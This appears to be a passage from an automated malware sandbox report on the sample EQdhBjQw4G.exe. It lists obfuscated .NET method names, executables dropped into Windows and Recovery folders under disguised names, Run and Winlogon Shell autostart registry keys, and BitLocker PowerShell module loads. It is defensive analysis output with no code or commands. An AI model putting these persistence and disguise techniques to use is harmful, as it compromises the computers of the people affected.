                            Source: EQdhBjQw4G.exe, SrQXFPHxddbtDS4VpSI.csHigh entropy of concatenated method names: 'POpHJK2ZaN', 'k6r', 'ueK', 'QH3', 'zyGHVqRd8u', 'Flush', 'eCqH0U37l4', 'iToH3js6Tp', 'Write', 'YcSHkr5JOB'
                            Source: EQdhBjQw4G.exe, XT9hJbfnKtGNy7CaF9j.csHigh entropy of concatenated method names: 'fWnfmgJaHj', 'Ou9faiLJ48', 'wcTfXBxO0D', 'lfKdufBTMY8V8Uj9m7Mt', 'EitVuZBTlcuWrWMa4sDN', 'uq73hiBTUqa9CHaTrEIR', 'rO3lVoBTie76uyxbMMXQ', 'L61fTaG6EA', 'suof56XBhQ', 'rZhfwDr5c2'
                            Source: EQdhBjQw4G.exe, upNa45QCvs48jrqMkqX.csHigh entropy of concatenated method names: 'G5W2Fg5FJB', 'e512BKfglK', 'Yd7', 'bZm2WcQMGb', 'kQ52ohI2l8', 'osv2b80Lag', 'qCj2htpcS3', 'nJUtGZBxbnVUVWLNaiLH', 'rw5PY0BxW1Uc4iINdXm4', 'EoICrnBxoC4a0h107UHO'
                            Source: EQdhBjQw4G.exe, doxEQiEB5gR2aIxorCJ.csHigh entropy of concatenated method names: 'PQLEo9h1Xn', 'aG4EbrOgY7', 'WYfEhWH2m0', 'RMIYXeBHNjiuXw51jKsk', 'qxqiwyBHYgUZFQSgKQyj', 'WEx5WWBHrQQ4lEEeZqcO', 'a01AF2BHLvDX6Yuci8gO', 'WC0HSEBHUKsRlkVZxUVx', 'rHiAS9BHiUTvweCHpYtn'
                            Source: EQdhBjQw4G.exe, Yuhnvpn2QhnxP4kSHU4.csHigh entropy of concatenated method names: 'rtBnHttrJP', 'UOGn17WDT2', 'Pykn6jKrUY', 'tQHnRaHiv4', 'Mpvn9Rjj4L', 'QshnnBZI1h', 'V50ndY8cEB', 'KABnTqfeTU', 'tT9n5IRT94', 'eANnwYxDAy'
                            Source: EQdhBjQw4G.exe, Uuq7DtemIloFIxNDh00.csHigh entropy of concatenated method names: 'fuue3GotfP', 'Wc33qiB6ibqWULW1vLKt', 'h93aHnB6L7SWmAgt3bKj', 'H8P8QYB6UKbcuQSUNld3', 'yu7GLVB6MNbp61r2iuc7', 'P9X', 'vmethod_0', 'oR8Bbt0eVdt', 'imethod_0', 'tMqCEhB6vvDEN1arN5tJ'
                            Source: EQdhBjQw4G.exe, E8R0v1SUlCEpt5FBll3.csHigh entropy of concatenated method names: 'a7KIKpBw8eyqZsLogDaU', 'FRs1NeBwK7n9ROipX60Y', 'HKZ37jBwtlhMv4w7KSaP', 'BS4ycJBw4l5bTB5QhKI9', 'LYPbpWBwcJACfoZMPTcn', 'method_0', 'method_1', 'kGrSMAbUdQ', 'oMjSl5VVqO', 'JJZSf3ZH8P'
                            Source: EQdhBjQw4G.exe, UOKYr93Y4GeCUG8PEXE.csHigh entropy of concatenated method names: 'ere3UNiNwm', 'qFo3fGbAHj', 'PhJ3DUQZPH', 'JSk372wl8q', 'tK6347rEiL', 'k5h3cVa46e', 'Hw038PwGBH', 'A3J3Khqj1X', 'Dispose', 'wPPq76BqUrB75EhoOXiQ'

                            Persistence and Installation Behavior

                            barindex
                            Drops executables to the windows directory (C:\Windows) and starts them
                            Source: unknownExecutable created and started: C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                            Infects executable files (exe, dll, sys, html)
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile created: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeJump to dropped file
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile created: C:\Users\user\Desktop\vTqzCdqK.logJump to dropped file
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile created: C:\Users\user\Desktop\nmJRokpY.logJump to dropped file
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeFile created: C:\Users\user\Desktop\FpFoWZYA.logJump to dropped file
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeFile created: C:\Users\user\Desktop\CnTGBqTF.logJump to dropped file
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeJump to dropped file
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile created: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeJump to dropped file
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile created: C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile created: C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeJump to dropped file
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile created: C:\Users\user\Desktop\vTqzCdqK.logJump to dropped file
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile created: C:\Users\user\Desktop\nmJRokpY.logJump to dropped file
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeFile created: C:\Users\user\Desktop\CnTGBqTF.logJump to dropped file
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeFile created: C:\Users\user\Desktop\FpFoWZYA.logJump to dropped file

                            Boot Survival

                            barindex
                            Creates an autostart registry key pointing to binary in C:\Windows
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ROxqvkhuKqPawtyxZXXxveaCsizbJJump to behavior
                            Creates an undocumented autostart registry key
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                            Creates multiple autostart registry keys
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ROxqvkhuKqPawtyxZXXxveaCsizbJJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EQdhBjQw4GJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile created: C:\Users\Default User\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe\:Zone.Identifier:$DATAJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile created: C:\Users\Default User\Start Menu\a4716c5db9108bJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ROxqvkhuKqPawtyxZXXxveaCsizbJJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ROxqvkhuKqPawtyxZXXxveaCsizbJJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBrokerJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EQdhBjQw4GJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EQdhBjQw4GJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EQdhBjQw4GJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EQdhBjQw4GJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ROxqvkhuKqPawtyxZXXxveaCsizbJJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ROxqvkhuKqPawtyxZXXxveaCsizbJJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ROxqvkhuKqPawtyxZXXxveaCsizbJJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ROxqvkhuKqPawtyxZXXxveaCsizbJJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ROxqvkhuKqPawtyxZXXxveaCsizbJJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ROxqvkhuKqPawtyxZXXxveaCsizbJJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ROxqvkhuKqPawtyxZXXxveaCsizbJJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ROxqvkhuKqPawtyxZXXxveaCsizbJJump to behavior

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Loading BitLocker PowerShell Module
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
